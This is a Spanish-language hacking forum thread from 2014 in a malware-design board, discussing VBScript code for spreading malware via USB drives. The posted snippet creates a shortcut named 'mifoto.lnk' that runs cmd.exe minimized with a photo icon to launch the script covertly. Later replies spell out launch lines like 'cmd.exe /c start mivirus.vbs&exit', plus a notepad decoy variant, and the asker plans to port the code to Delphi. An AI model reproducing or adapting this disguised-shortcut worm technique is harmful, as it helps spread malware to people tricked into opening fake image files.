elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Duda sobre USB spread
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Duda sobre USB spread  (Leído 4,240 veces)
jeshuem

Desconectado Desconectado

Mensajes: 23


Ver Perfil
Duda sobre USB spread
« en: 17 Marzo 2014, 23:59 pm »

Alguien que sea tan amable de explicarme estas lineas que dejo de ejemplo MadAntrax en uno de sus post, no estoy muy familiarizado con este tipo de spread.
Código
  1. set lnkobj = WSS.createshortcut (drive.path & "\mifoto.lnk")
  2. lnkobj.windowstyle = 7
  3. lnkobj.targetpath = "cmd.exe"
  4. lnkobj.workingdirectory = ""
  5. lnkobj.arguments = "/c start " & replace(wscript.scriptname," ", chrw(34) & " " & chrw(34)) & "&exit"
  6. lnkobj.iconlocation = WSS.regread ("HKEY_LOCAL_MACHINE\software\classes\jpegfile\defaulticon\")
  7. lnkobj.save()
  8.  
En línea

xXSCORPIOXx

Desconectado Desconectado

Mensajes: 26



Ver Perfil
Re: Duda sobre USB spread
« Respuesta #1 en: 18 Marzo 2014, 00:11 am »

Digamos que basicamente crea el .lnk apuntando hacia el CMD con parametros y asignandole un Icono de imagen.

//Regards.
En línea

El saber es como el alcohol, cuando ves que te duele la cabeza, es demasiado tarde.
jeshuem

Desconectado Desconectado

Mensajes: 23


Ver Perfil
Re: Duda sobre USB spread
« Respuesta #2 en: 18 Marzo 2014, 00:49 am »

Para ser mas preciso en la linea

Código
  1. lnkobj.arguments = "/c start " & replace(wscript.scriptname," ", chrw(34) & " " & chrw(34)) & "&exit"


que argumentos debe tener un lnk para que ejecute un programa?
En línea

xXSCORPIOXx

Desconectado Desconectado

Mensajes: 26



Ver Perfil
Re: Duda sobre USB spread
« Respuesta #3 en: 18 Marzo 2014, 01:28 am »

Para ser mas preciso en la linea

Código
  1. lnkobj.arguments = "/c start " & replace(wscript.scriptname," ", chrw(34) & " " & chrw(34)) & "&exit"


que argumentos debe tener un lnk para que ejecute un programa?

Simplemente llama a la aplicacion desde el CMD con "Start", aunque creo que se deberia usar WScript.ScriptFullName, a ver si lo ve MadAntrax.

//Regards.
En línea

El saber es como el alcohol, cuando ves que te duele la cabeza, es demasiado tarde.
jeshuem

Desconectado Desconectado

Mensajes: 23


Ver Perfil
Re: Duda sobre USB spread
« Respuesta #4 en: 18 Marzo 2014, 05:22 am »

Cual es su sintaxis del argumento? sin el codigo como seria?
En línea

Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.166


Cheats y Trainers para todos!


Ver Perfil WWW
Re: Duda sobre USB spread
« Respuesta #5 en: 18 Marzo 2014, 10:36 am »

No es necesario mandar argumentos a un LNK para que ejecute un fichero, son solo targetpath es suficiente.

En el ejemplo, lo que hace el código es crear un acceso directo a cmd.exe y le cambio el icono de la ventanita negra por la de la foto.jpg

básicamente el acceso sería:

cmd.exe /c start mivirus.vbs&exit

Podría ser también así:

cmd.exe /c start mivirus.vbs&start notepad.exe&exit

(Ese ejemplo ejecuta el virus + notepad y luego cierra el cmd). Si lo combinas con WindowsStyle=7 el cmd se ejecuta minimizado).

Saludos
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
jeshuem

Desconectado Desconectado

Mensajes: 23


Ver Perfil
Re: Duda sobre USB spread
« Respuesta #6 en: 18 Marzo 2014, 15:16 pm »

La funcion replace que es para remplazar codenas a que viene?

Código
  1. replace(wscript.scriptname," ", chrw(34) & " " & chrw(34))
En línea

Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.166


Cheats y Trainers para todos!


Ver Perfil WWW
Re: Duda sobre USB spread
« Respuesta #7 en: 18 Marzo 2014, 15:18 pm »

La funcion replace que es para remplazar codenas a que viene?

Código
  1. replace(wscript.scriptname," ", chrw(34) & " " & chrw(34))

No se pueden usar espacios en los nombres. Lo que hago es coger el nombre del fichero y reemplazo el espacio (" ") por chrw(34) & " " & chrw(34)
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
jeshuem

Desconectado Desconectado

Mensajes: 23


Ver Perfil
Re: Duda sobre USB spread
« Respuesta #8 en: 18 Marzo 2014, 16:22 pm »

Ah ok gracias eres un grande jaja, no sabia que no se podia usar espacios, gracias. Ahora toca pasarlo a delphi.

Saludos.
En línea

xXSCORPIOXx

Desconectado Desconectado

Mensajes: 26



Ver Perfil
Re: Duda sobre USB spread
« Respuesta #9 en: 18 Marzo 2014, 22:37 pm »

No se pueden usar espacios en los nombres. Lo que hago es coger el nombre del fichero y reemplazo el espacio (" ") por chrw(34) & " " & chrw(34)
Eso era lo que a mi me despistaba, sería mejor algo tipo Chr(34) & WScript.ScriptFullName & Chr(34), no?

PD: Perdonad que no use Etiquetas, ando desde el movil por viajes de negocios.

//Regards.
En línea

El saber es como el alcohol, cuando ves que te duele la cabeza, es demasiado tarde.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
duda sobre formateo y cosa sobre todos los pcs de una casa
Dudas Generales
Senior++ 5 5,044 Último mensaje 27 Agosto 2011, 09:21 am
por Senior++
[vbs][source] spread usb
Scripting
daryo 1 3,240 Último mensaje 10 Diciembre 2014, 04:24 am
por .BrutuS
Metodo de USB Spread quefuncione?
Análisis y Diseño de Malware
Noblex07 2 3,607 Último mensaje 7 Junio 2014, 19:27 pm
por daryo
MOVIDO: Metodo de USB Spread quefuncione?
Ingeniería Inversa
.:UND3R:. 0 2,146 Último mensaje 30 Mayo 2014, 01:55 am
por .:UND3R:.
[VBS] [SOURCE] Dropbox Spread
Análisis y Diseño de Malware
.BrutuS 2 3,435 Último mensaje 9 Diciembre 2014, 22:12 pm
por .BrutuS
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines